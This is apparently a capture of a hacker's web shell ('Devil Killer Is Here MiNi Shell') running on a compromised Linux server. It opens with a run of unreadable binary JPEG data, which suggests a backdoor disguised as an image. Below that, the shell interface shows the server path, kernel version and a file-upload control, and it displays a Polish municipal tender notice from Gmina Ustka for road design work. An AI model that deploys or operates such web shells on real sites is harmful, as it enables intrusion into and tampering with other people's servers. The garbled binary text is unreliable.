JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211028/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211028/0024909801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowej (budowlanej) dla zadań dot. budowy dróg w miejscowościach Starkowo, Rowy, Dębina </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wójt Gminy Ustka</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 770979878</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dunina 24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ustka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-270</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL636 - Słupski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@ustka.ug.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.ustka.ug.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowej (budowlanej) dla zadań dot. budowy dróg w miejscowościach Starkowo, Rowy, Dębina </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-81a7f411-37c7-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00249098</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000982/16/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.7 Wykonanie projektów na potrzeby uzyskania dofinansowania zewnętrznego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.ustka.ug.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.bip.ustka.ug.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej, z zastrzeżeniem, że złożenie oferty oraz oświadczeń następuje wyłącznie przy użyciu miniPortalu.<br/>2. Wykonawca zamierzający wziąć udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, cyfrowego odwzorowania dokumentów w postaci papierowej (elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP.<br/>4. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB.<br/>5. Za datę przekazania oferty przyjmuje się datę jej przekazania na ePUAP. Za datę przekazania wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów w postaci papierowej (elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz innych informacji przyjmuje się datę ich przekazania na adres poczty elektronicznej Zamawiającego wskazany w pkt 9 swz.<br/>6. Dane postępowania można wyszukać również na Liście wszystkich postępowań klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki Postępowania na miniPortalu.<br/>7. Ofertę wraz z formularzem cenowym, sporządza się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna została zawarta w pkt 34 SWZ.<br/>1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Gmina Ustka ul. Dunina 24, 76-270 Ustka reprezentowana przez Wójta Gminy Ustka. Administrator wyznaczył Inspektora Ochrony Danych Osobowych p. Pani Katarzyna Jakubowska, e-mail: iod@ustka.ug.gov.pl;, z którym w sprawach dotyczących przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej pod adresem iod@ustka.ug.gov.pl lub telefonicznie pod numerem 693 064 318.<br/>2. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.<br/>3. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia.<br/>4. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności.<br/>5. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>6. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP.<br/>7. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego.<br/>8. Niezależnie od postanowień pkt 7 powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>9. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe.<br/>10. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Klauzula informacyjna została zawarta w pkt 34 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZP.271.30.2021.MA</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I: Budowa/przebudowa drogi gminnej nr 101312G, 101319G, 101315G, 101317G, 101320G (drogi w centrum Starkowa od drogi powiatowej nr 1105G w kierunku Golęcina)<br/>	1. Zakres przedmiotu zamówienia obejmuje wykonanie:<br/> 1) dokumentacji budowlanej, która winna spełniać wymagania określone w art. 99 -103 ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych oraz przepisach wykonawczych w ww. ustawy z zastrzeżeniem, że do czasu wydania tych przepisów dokumentacja ta winna uwzględniać n/w przepisy: <br/> • rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r, w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno – użytkowego (tekst jednolity: Dz. U. z 2013 r. poz. 1129),<br/> • rozporządzenia Ministra Rozwoju w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia 11 września 2020 r. (Dz. U. z 2020 r. poz. 1609), <br/> • rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126);<br/>2) dokumentacja wskazana w pkt.1) winna uwzględniać przepisy obowiązujące w chwili jej zatwierdzenia przez uprawnione organy lub Zamawiającego, jednakże w przypadku zmiany przepisów w trakcie realizacji umowy dokumentacja winna uwzględniać zmiany w zakresie niezbędnym do użytkowania przedmiotu umowy. <br/>2. W ramach wykonania zakresu określonego w pkt. 3.1.1.1) Wykonawca zobowiązany będzie do:<br/>1) opracowania map do celów projektowych – 1 egz.,<br/>2) opracowania dokumentacji geotechnicznej – 5 egz.,<br/>3) opracowania pełnobranżowej dokumentacji budowlanej – 5 egz., obejmującej w szczególności:<br/>- zagospodarowanie terenu,<br/>- projekt branży drogowej, sanitarnej, elektrycznej, telekomunikacyjnej w zakresie rozwiązań technicznych infrastruktury,<br/>4) opracowania przedmiaru robót – 5 egz.,<br/>5) opracowania kosztorysu inwestorskiego – 5 egz.,<br/>6) opracowania specyfikacji technicznych wykonania i odbioru robót – 5 egz.,<br/>7) opracowania informacji dotyczącej Bezpieczeństwa i Ochrony Zdrowia– 5 egz.,<br/>8) opracowania koncepcji budowy dróg wraz z szacunkowym zestawieniem kosztów – 5 egz.,<br/>9) uzyskania niezbędnych uzgodnień, opinii i oświadczeń – 1 egz.,<br/>10) uzyskania w imieniu zamawiającego dokumentu uprawniającego do realizacji robót budowlanych – 1 egz.,<br/>11) innych dokumentów niezbędnych do udzielenia zamówienia publicznego na roboty stanowiące przedmiot dokumentacji projektowej <br/>3. Przeniesienie praw autorskich przedmiotu umowy następuje w chwili zapłaty wynagrodzenia bez ograniczeń, co do terytorium, czasu i liczby egzemplarzy na polach eksploatacji wymienionych w art. 50 ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych (Dz. U. z 2021 r. poz. 1062 ze zm.), obejmujących bez prawa do dodatkowego wynagrodzenia.<br/>4. Szczegółowy opis przedmiotu zamówienia został opisany w załączniku nr 8 do SWZ (część I: 8.1),- projekt umowy oraz załączniku nr 10 do SWZ - opis przedmiotu zamówienia (część I: 10.1). <br/>5 Dokumentacja projektowa jest realizowana w ramach programu wieloletniego pod nazwą „Wykonanie projektów na potrzeby uzyskania dofinansowania zewnętrznego”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">230 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie<br/>zgodnie z formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i<br/>oświadczeniach, o których mowa w rozdziale 14 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenia projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II: „Budowa połączenia drogowego od ul. Bałtyckiej do Traktu Pierwszych Rybaków w m. Rowy Gmina Ustka”<br/>	1. Zakres przedmiotu zamówienia obejmuje wykonanie:<br/> 1) dokumentacji budowlanej, która winna spełniać wymagania określone w art. 99 -103 ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych oraz przepisach wykonawczych w ww. ustawy z zastrzeżeniem, że do czasu wydania tych przepisów dokumentacja ta winna uwzględniać n/w przepisy: <br/> • rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r, w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno – użytkowego (tekst jednolity: Dz. U. z 2013 r. poz. 1129),<br/> • rozporządzenia Ministra Rozwoju w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia 11 września 2020 r. (Dz. U. z 2020 r. poz. 1609), <br/> • rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126);<br/>2) dokumentacja wskazana w pkt.1) winna uwzględniać przepisy obowiązujące w chwili jej zatwierdzenia przez uprawnione organy lub Zamawiającego, jednakże w przypadku zmiany przepisów w trakcie realizacji umowy dokumentacja winna uwzględniać zmiany w zakresie niezbędnym do użytkowania przedmiotu umowy. <br/>2. W ramach wykonania zakresu określonego w pkt. 3.2.1.1) Wykonawca zobowiązany będzie do:<br/>1) opracowania map do celów projektowych – 1 egz.,<br/>2) opracowania dokumentacji geotechnicznej – 5 egz.,<br/>3) opracowania pełnobranżowej dokumentacji budowlanej – 5 egz., obejmującej w szczególności:<br/>- zagospodarowanie terenu,<br/>- projekt branży drogowej, sanitarnej, elektrycznej, telekomunikacyjnej w zakresie rozwiązań technicznych infrastruktury,<br/>4) opracowania przedmiaru robót – 5 egz.,<br/>5) opracowania kosztorysu inwestorskiego – 5 egz.,<br/>6) opracowania specyfikacji technicznych wykonania i odbioru robót – 5 egz.,<br/>7) opracowania informacji dotyczącej Bezpieczeństwa i Ochrony Zdrowia– 5 egz.,<br/>8) opracowania koncepcji budowy dróg wraz z szacunkowym zestawieniem kosztów – 5 egz.,<br/>9) uzyskania niezbędnych uzgodnień, opinii i oświadczeń – 1 egz.,<br/>10) uzyskania w imieniu zamawiającego dokumentu uprawniającego do realizacji robót budowlanych – 1 egz.,<br/>11) innych dokumentów niezbędnych do udzielenia zamówienia publicznego na roboty stanowiące przedmiot dokumentacji projektowej <br/>3. Przeniesienie praw autorskich przedmiotu umowy następuje w chwili zapłaty wynagrodzenia bez ograniczeń, co do terytorium, czasu i liczby egzemplarzy na polach eksploatacji wymienionych w art. 50 ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych (Dz. U. z 2021 r. poz. 1062 ze zm.), obejmujących bez prawa do dodatkowego wynagrodzenia.<br/>4. Szczegółowy opis przedmiotu zamówienia został opisany w załączniku nr 8 do SWZ (część II: 8.2),- projekt umowy oraz załączniku nr 10 do SWZ - opis przedmiotu zamówienia (część II: 10.2). <br/>5 Dokumentacja projektowa jest realizowana w ramach programu wieloletniego pod nazwą „Wykonanie projektów na potrzeby uzyskania dofinansowania zewnętrznego”. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">230 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Ocena spełniania warunków udziału w postępowaniu dokonana zostanie<br/>zgodnie z formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i<br/>oświadczeniach, o których mowa w rozdziale 14 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenia projektanta branży drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć III: „Budowa połączenia drogowego od ul. Gorzelnianej do ul. Jesionowej w m. Dębina Gmina Ustka ”<br/>	1. Zakres przedmiotu zamówienia obejmuje wykonanie:<br/>1) dokumentacji budowlanej, która winna spełniać wymagania określone w art. 99 -103 ustawy z dnia 11 września 2019 roku Prawo zamówień publicznych oraz przepisach wykonawczych w ww. ustawy z zastrzeżeniem, że do czasu wydania tych przepisów dokumentacja ta winna uwzględniać n/w przepisy: <br/> • rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r, w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno – użytkowego (tekst jednolity: Dz. U. z 2013 r. poz. 1129),<br/> • rozporządzenia Ministra Rozwoju w sprawie szczegółowego zakresu i formy projektu budowlanego z dnia 11 września 2020 r. (Dz. U. z 2020 r. poz. 1609), <br/> • rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003 r. Nr 120, poz. 1126);<br/>2) dokumentacja wskazana w pkt.1) winna uwzględniać przepisy obowiązujące w chwili jej zatwierdzenia przez uprawnione organy lub Zamawiającego, jednakże w przypadku zmiany przepisów w trakcie realizacji umowy dokumentacja winna 